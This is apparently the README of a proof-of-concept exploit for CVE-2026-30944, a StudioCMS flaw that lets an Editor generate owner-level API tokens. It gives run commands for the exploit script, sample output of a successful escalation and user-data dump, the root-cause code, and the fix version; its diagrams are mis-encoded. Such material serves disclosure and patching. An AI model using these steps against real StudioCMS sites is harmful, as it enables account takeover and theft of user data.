Share
## https://sploitus.com/exploit?id=8EDAA12B-717B-5A59-9916-F67977827A57
๐Ÿ”“ CVE-2026-30944


  StudioCMS Privilege Escalation via Insecure API Token Generation



  
  
  
  



  NVD โ€ข
  Advisory โ€ข
  CWE-639


---

## Overview

The `POST /studiocms_api/dashboard/api-tokens` endpoint in **StudioCMS โ‰ค 0.3.0** allows any authenticated user (at minimum `Editor` role) to generate API tokens for **any other user**, including `owner` and `admin` accounts.

The endpoint accepts a `user` parameter in the request body specifying the target user UUID but **never validates** whether the requesting user is authorized to create tokens on behalf of that target. This is a classic **Broken Object Level Authorization (BOLA)** vulnerability that results in full privilege escalation.

### Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     POST /api-tokens      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚              โ”‚    {"user":""}    โ”‚              โ”‚
โ”‚   Attacker   โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บ โ”‚  StudioCMS   โ”‚
โ”‚   (Editor)   โ”‚                            โ”‚   Server     โ”‚
โ”‚              โ”‚ โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜    {"token":"eyJhb..."}    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
       โ”‚                                           โ”‚
       โ”‚         GET /rest/v1/users                โ”‚
       โ”‚   Authorization: Bearer      โ”‚
       โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บโ”‚
       โ”‚                                           โ”‚
       โ”‚ โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”‚
       โ”‚         [Full user data as Owner]         โ”‚
       โ”‚                                           โ”‚
```

### Vulnerability Details

| Field | Value |
|---|---|
| **CVE** | [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) |
| **GHSA** | [GHSA-667w-mmh7-mrr4](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-667w-mmh7-mrr4) |
| **CVSS v3.1** | **8.8** (High) โ€” `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| **CWE** | CWE-639: Authorization Bypass Through User-Controlled Key |
| **CWE (secondary)** | CWE-863: Incorrect Authorization |
| **MITRE ATT&CK** | T1134 โ€” Access Token Manipulation |
| **OWASP API** | API1:2023 โ€” Broken Object Level Authorization |
| **Affected** | `studiocms โ‰ค 0.3.0` |
| **Fixed in** | `studiocms 0.4.0` |

---

## Contents

| File | Description |
|---|---|
| `cve_2026_30944_poc.py` | Python exploitation script with manual & automated modes |
| `README.md` | This file |
| `LICENSE` | MIT License |

---

## Prerequisites

- **StudioCMS โ‰ค 0.3.0** (vulnerable version)
- Python 3.8+
- Valid credentials for at least an `Editor` account

```bash
pip install requests colorama
```

---

## Quick Start

### Manual Exploitation

```bash
# Generate an API token for the owner using an editor account
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# Save results to JSON
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --save
```

### Automated Testing

```bash
# Test with multiple roles to confirm the vulnerability
python3 cve_2026_30944_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --uuid 2450bf33-0135-4142-80be-9854f9a5e9f1
```

---

## Arguments

### Required

| Argument | Description |
|---|---|
| `-u, --url` | Target StudioCMS base URL |
| `--uuid` | Target user UUID (e.g., owner account) |

### Manual Mode

| Argument | Description |
|---|---|
| `--username` | Username for authentication |
| `--password` | Password for authentication |

### Automated Test Mode

| Argument | Description |
|---|---|
| `--auto-test` | Enable automated multi-role testing |
| `--editor-user` | Editor account username |
| `--editor-pass` | Editor account password |
| `--visitor-user` | Visitor account username |
| `--visitor-pass` | Visitor account password |

### Optional

| Argument | Description |
|---|---|
| `--save` | Save results to JSON file |
| `--no-ssl-verify` | Disable SSL certificate verification |

---

## Example Output

### Vulnerable System

```
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 1: Authentication
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [+] Authenticated as 'editor01'
  [*] Session user: editor01 (editor)
  [*] Session UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 2: Privilege Escalation
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Generating API token for target user...
  [+] API token generated successfully!
  [!] Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2...

  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 3: Verification
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [*] Verifying token access on REST API...
  [+] VULNERABILITY CONFIRMED โ€” Full API access achieved!
  [*] Retrieved 9 user records
```

### Patched System

```
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 2: Privilege Escalation
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Generating API token for target user...
  [*] Access denied (403 Forbidden) โ€” endpoint may be patched
  [-] Exploitation failed โ€” token not generated
```

---

## Root Cause

The vulnerable handler at `packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts` (lines 16โ€“57) accepts a `user` parameter from the JSON body and passes it directly to the token generation function without authorization checks:

```typescript
// [1] Only checks if caller is editor โ€” not WHO they're creating a token for
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;

// [2] 'user' from request body โ€” no validation against authenticated session
const jsonData = yield* readAPIContextJson(ctx);

// [3] Passed directly to token generation โ€” IDOR
const newToken = yield* sdk.REST_API.tokens.new(jsonData.user, jsonData.description);
```

The authorization model only verifies *"is the caller at least an editor?"* instead of *"is the caller authorized to create a token for this specific user?"*

---

## Impact

- **Privilege Escalation** โ€” Any editor can escalate to owner-level API access
- **Full API Access** โ€” Generated token grants unrestricted access to all REST endpoints
- **Account Takeover** โ€” Attacker can impersonate any user by specifying their UUID
- **Data Breach** โ€” Access to user listings, content, and system configuration

---

## Mitigation

Update StudioCMS to version **0.4.0** or later:

```bash
npm install studiocms@latest
```

---

## Legal Disclaimer

**This tool is provided for educational and authorized security testing purposes only.**

- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The author assumes no liability for misuse of this tool
- Always follow responsible disclosure practices

---

## References

- **CVE:** [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944)
- **Advisory:** [GHSA-667w-mmh7-mrr4](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-667w-mmh7-mrr4)
- **CWE:** [CWE-639 โ€” Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)
- **OWASP:** [API1:2023 โ€” Broken Object Level Authorization](https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/)
- **MITRE ATT&CK:** [T1134 โ€” Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)

---

## Author

**Filipe Gaudard**

---

## License

This PoC is released under the [MIT License](LICENSE) for educational purposes. Use responsibly and ethically.